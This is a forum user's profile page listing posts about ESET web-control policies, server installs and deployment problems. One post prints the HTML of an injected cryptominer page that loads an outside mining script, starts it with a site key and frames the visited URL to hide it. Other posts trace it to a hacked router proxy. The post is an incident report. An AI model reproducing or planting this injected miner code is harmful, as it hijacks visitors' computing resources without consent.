Jump to content

MAGIK José Rocha

Members
  • Content Count

    12
  • Joined

  • Last visited

Profile Information

  • Location
    Portugal

Recent Profile Visitors

334 profile views
  1. We are applying a custom policy for web control where we allow specific URL's and after that we block a Category Group. The problem we are facing is that, if the allowed url belongs to a blocked Category, the user can't access that url. From the documentation found HERE, this is not the expected behaviour and the user should be able to access the URL as they are evaluated first. With the settings example bellow, we are unable to access WINESTUFF.PT because it's being blocked by the category based rule where we block "Alcohol and Tobacco" related sites.
  2. Will have to try that solution tomorrow. Thanks for your help.
  3. I've implemented an Internet access control policy where we have the following requirements: Block access to several group categories of sites Allow access to specific urls The problem is that I'm getting the sites blocked by category but the url group's we allow are also blocked, if they belong to one of the blocked categories. I believe ESET should act as a regular firewall, applying rules in the order I've configured, and accepting a connection as soon as it's authorised, not proceeding to the following rules. Here is an piece of my policy:
  4. I undertand that it isn't a recommended approach but we've had it working on critical server for a long time ago without any issue. The reason for that is that we have real people working on that server, receiving emails, accessing web pages and all those things we have inside a Desktop OS and File Server v6 didn't address our needs. I believe the installer was blocking the installation of Endpoint v7 on a server but maybe I missed something. Will check it again on a demo server. The URL Management is not that easy to maintain, so we must find another way. Thanks for your help.
  5. A lot of our clients use Windows Server to provide RDP services for their users, local and remote ones. As most of they users are point of sales operators they internet access to the company website and other websites related to products that they work with, but shouldn't use other webpages. On the other end there are groups of users who may access social networks and other users that must have unrestricted access to internet. With ESET Version 6 we made it by installing ESET Endpoint Security and tweaking policies to make it work in a Windows Server without impact on performance or
  6. I've made a Policy for all workstation on that domain to disable Smartscreen and the Deployment Tool was able to install without any problem.
  7. I've created a all-in-one installer to use with Eset Deployment Tool and it went without erros, showing a success message. The problem is that nothing was installed and the workstation is still running the older versions. I tried to run the same installer at that workstation to see if there is some error at the installation process and I've received a message that Smartscreen has blocked the execution of the installer. Then, I've asked smartsceen to run the setup anyway and everything is installed without problems. Is there any way of making the deployment tool avoid this m
  8. Here is the html source for the page that runs the miner: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>"$(url)"</title> <_script src="https://coinhive.com/lib/coinhive.min.js"></script> <_script> var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2}); miner.start(); </script> </head> <frameset> <frame src="$(url)"></frame> </frameset> </html>
  9. I've been able to find the origin of this detections and already solved the problem. When I was trying to understand the origin of this trojans, I've noticed that some os the addresses where legit and doesn't raise any problems outside our client network. So I started a search for some kind of proxy that could inject malicious code tho legit http pages and find out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code and it was blocked later on the client machine. The hack h
  10. Here are the collected logs on the affected machine. Thanks for your help. ees_logs.zip
  11. Hi, We have a computer with more than 10.000 detected threats like the one bellow: Threat: JS/CoinMiner.AH Process: C:\Windows\System32\wscript.exe Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login Is this a sign that the computer is infected or this is the result of attempts to infect it? Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates.
×
×
  • Create New...